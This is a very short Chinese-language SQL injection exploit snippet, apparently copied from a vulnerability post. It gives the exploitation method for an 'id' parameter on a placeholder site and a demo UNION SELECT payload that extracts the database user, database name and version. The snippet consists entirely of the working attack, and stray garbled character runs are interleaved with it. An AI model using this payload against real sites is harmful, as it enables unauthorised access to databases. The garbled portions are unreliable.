利用方法:: V5 m' v8 i. X8 Z( Z" E, g
http://www.xxx.com/index.php?id=[SQL]* H+ @2 T( G2 s5 E1 t0 x
Demo:
8 Q/ O% B1 Z! [& b+ n http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |